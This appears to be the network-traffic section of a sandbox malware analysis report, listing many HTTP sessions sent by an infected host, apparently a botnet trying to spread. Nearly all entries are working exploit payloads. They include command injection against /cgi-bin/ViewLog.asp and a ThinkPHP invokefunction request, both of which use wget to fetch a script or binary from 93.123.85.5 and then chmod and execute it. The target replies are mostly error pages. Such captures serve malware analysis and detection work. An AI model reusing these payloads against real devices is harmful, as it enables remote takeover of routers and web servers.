                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:02.525594950 CET20697OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              744192.168.2.234125894.120.158.298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.205954075 CET14632OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              745192.168.2.236077295.86.81.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.219546080 CET14633OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              746192.168.2.235177085.237.176.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.243277073 CET14634OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              747192.168.2.235658695.216.217.808080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.503626108 CET14638OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.813911915 CET14679INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              748192.168.2.235753885.11.20.1588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.524241924 CET14639OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.165743113 CET14872OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.117495060 CET15139OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.212996006 CET15680OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:14.147929907 CET16664OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.761882067 CET18555OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:02.525636911 CET20698OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              749192.168.2.233684431.209.153.538080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.531115055 CET14641OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.856348991 CET14740INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              75192.168.2.234920431.200.60.848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.414499998 CET2585OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              750192.168.2.233885094.120.161.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.562541008 CET14643OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              751192.168.2.2348474112.46.34.3080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.779347897 CET14679OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              75285.237.176.1228080192.168.2.2351794
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.962789059 CET14752INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 22:19:58 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              753192.168.2.2336084112.125.241.12280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:59.019313097 CET14754OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.331995964 CET14767INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:24 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              754192.168.2.2346988112.74.34.20080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:59.029268026 CET14755OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.352531910 CET14768INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              755192.168.2.2342362112.83.37.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:59.057924032 CET14757OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.410113096 CET14769INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:19:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              756192.168.2.2342366112.83.37.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:59.059302092 CET14758OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.412909985 CET14770INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:19:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              757192.168.2.2342364112.83.37.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:59.059492111 CET14758OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.413233042 CET14771INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:19:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              758192.168.2.235507495.216.240.738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.231095076 CET14874OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.542725086 CET14891INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              759192.168.2.233967231.136.244.908080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.881376028 CET14989OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.893534899 CET15134OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
